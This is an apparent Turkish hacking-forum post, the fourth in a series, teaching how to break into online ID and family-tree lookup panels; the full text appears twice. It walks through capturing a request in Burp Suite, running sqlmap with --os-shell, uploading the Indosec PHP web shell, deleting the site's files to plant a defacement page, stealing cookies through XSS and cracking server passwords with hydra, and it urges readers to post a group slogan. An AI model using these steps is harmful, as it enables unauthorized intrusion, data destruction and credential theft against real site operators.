Merhaba değerli THT üyeleri paneller ile mücadelemizin 4. Bölümüdür. Bu bölümde nasıl web paneller hacklenir göstereceğim.
Öncelikle Programlarımızı Kuralım.
- BurpSuiteyi Kurun Professional / Community 2023.9.3
- SQLMAP KURUN sqlmap.org
- FireFox Tarayıcı Kurun.
ARDINDAN BURP SUİTEYİ AÇIN
FİREFOXU AÇIN
SQLMAPİ MASAÜSTÜNE ATIN
CMDYİ AÇIN
cd (klasöru sürekleyin)
Burp İsteklerin Çekilmesi İçin Gerekli Proxy Ayarları Yapılmalıdır Onuda Anlatayım.
FireFoxa Girin.
Sağ Üstten 3 Noktaya Basın
Ayarlara Basın
En Aşşağı inin Ağ Ayarlarına Basın
Vekil Sunucusunu Manuel Olarak Ayarlar
PORT KISMINA 8080 YAZIN HEPSİNE
SOL KUTUCUĞA 127.0.0.1 Local İP Girin
'KURULUM BU KADARDI'
Şimdi Gelelim Asıl Konuya
Öncelikle Herhangi Bi Panele Girin.
Aile & Sülale & Soyağacı & Kütük Sorgularından Herhangi Birisine Girin
TC YAZIN 11111111110 YADA 22222222220
SORGULA BUTONUNA BASIN.
BURP SUİTE PROXY>HTTP HİSTORY BASIN
EN AŞŞAĞI İNİN SİTE URL OLUCAK
RAW KISMINI KOPYALAYIN
SQLMAPİN KLASÖRÜNÜ açıp request.txt ADLI DOSYA OLUŞTURUN
CMDYİ TEKRAR AÇIN python sqlmap.py YAZIN
ARDINDAN python sqlmap.py -u request.txt --os-shell
GELEN SORULARA Y/N YANIT VERİN
HANGİSİ BÜYÜK HARFSE ONA GÖRE YANITI VERİNİZ! ÖRNEK y/N = N yazarsınız yada Y/n = Y Yazarsınız.
SONRA siteurl/shell.php GİBİ BİR DOSYA URLSİ VERİR ONU GOOGLE YAPIŞTIRIN
İNDOSEC SHELL İNDİRİN
İNDOSEC.PHP Yİ SİTEYE UPLOAD EDİN
siteurl/indosec.php
GİRİŞ İÇİN İÇİN YER VAR ORAY
Xamppi Açın htdocsa girin bütün dosyaları silip indexinizi yükleyin
hem vdsi şifresi değişti hemde siteye index bastınız
xss mevcut index basıp yada cookie çekebilirsiniz.
NOT:KULLANILAN HERHANGİ BİR TC KİMLİK NUMARASI GERÇEK DEGİLDİR HEPSİ API'lere BAĞLANILAN SAHTE TC KİMLİK NUMARASIDIR.
(VDS Şifresi "ADMİN BYPASS" yöntemleri veya "hydra" ile kırabilirsiniz.
BU vb.. konulara destek olmak veya öğrenmek (gelişmek) amacı ile kulübümüze üye olabilirsiniz.
Bir sonraki konuda "BOT PANELLER" e sızmaya anlatacağım.
Teknik bir sorundan dolayı index geliştiremedim. Ancak sizden istediğim index teki slogan şu şekilde olsun "İstediğimiz zaman İstediğimiz yerde" Sloganı ve #açıkpanelkalmayacak tag ı ekler iseniz sevinirim.
Öncelikle Programlarımızı Kuralım.
- BurpSuiteyi Kurun Professional / Community 2023.9.3
- SQLMAP KURUN sqlmap.org
- FireFox Tarayıcı Kurun.
ARDINDAN BURP SUİTEYİ AÇIN
FİREFOXU AÇIN
SQLMAPİ MASAÜSTÜNE ATIN
CMDYİ AÇIN
cd (klasöru sürekleyin)
Burp İsteklerin Çekilmesi İçin Gerekli Proxy Ayarları Yapılmalıdır Onuda Anlatayım.
FireFoxa Girin.
Sağ Üstten 3 Noktaya Basın
Ayarlara Basın
En Aşşağı inin Ağ Ayarlarına Basın
Vekil Sunucusunu Manuel Olarak Ayarlar
PORT KISMINA 8080 YAZIN HEPSİNE
SOL KUTUCUĞA 127.0.0.1 Local İP Girin
'KURULUM BU KADARDI'
Şimdi Gelelim Asıl Konuya
Öncelikle Herhangi Bi Panele Girin.
Aile & Sülale & Soyağacı & Kütük Sorgularından Herhangi Birisine Girin
TC YAZIN 11111111110 YADA 22222222220
SORGULA BUTONUNA BASIN.
BURP SUİTE PROXY>HTTP HİSTORY BASIN
EN AŞŞAĞI İNİN SİTE URL OLUCAK
RAW KISMINI KOPYALAYIN
SQLMAPİN KLASÖRÜNÜ açıp request.txt ADLI DOSYA OLUŞTURUN
CMDYİ TEKRAR AÇIN python sqlmap.py YAZIN
ARDINDAN python sqlmap.py -u request.txt --os-shell
GELEN SORULARA Y/N YANIT VERİN
HANGİSİ BÜYÜK HARFSE ONA GÖRE YANITI VERİNİZ! ÖRNEK y/N = N yazarsınız yada Y/n = Y Yazarsınız.
SONRA siteurl/shell.php GİBİ BİR DOSYA URLSİ VERİR ONU GOOGLE YAPIŞTIRIN
İNDOSEC SHELL İNDİRİN
İNDOSEC.PHP Yİ SİTEYE UPLOAD EDİN
siteurl/indosec.php
GİRİŞ İÇİN İÇİN YER VAR ORAY
Xamppi Açın htdocsa girin bütün dosyaları silip indexinizi yükleyin
hem vdsi şifresi değişti hemde siteye index bastınız
xss mevcut index basıp yada cookie çekebilirsiniz.
NOT:KULLANILAN HERHANGİ BİR TC KİMLİK NUMARASI GERÇEK DEGİLDİR HEPSİ API'lere BAĞLANILAN SAHTE TC KİMLİK NUMARASIDIR.
(VDS Şifresi "ADMİN BYPASS" yöntemleri veya "hydra" ile kırabilirsiniz.
BU vb.. konulara destek olmak veya öğrenmek (gelişmek) amacı ile kulübümüze üye olabilirsiniz.
Bir sonraki konuda "BOT PANELLER" e sızmaya anlatacağım.
Teknik bir sorundan dolayı index geliştiremedim. Ancak sizden istediğim index teki slogan şu şekilde olsun "İstediğimiz zaman İstediğimiz yerde" Sloganı ve #açıkpanelkalmayacak tag ı ekler iseniz sevinirim.
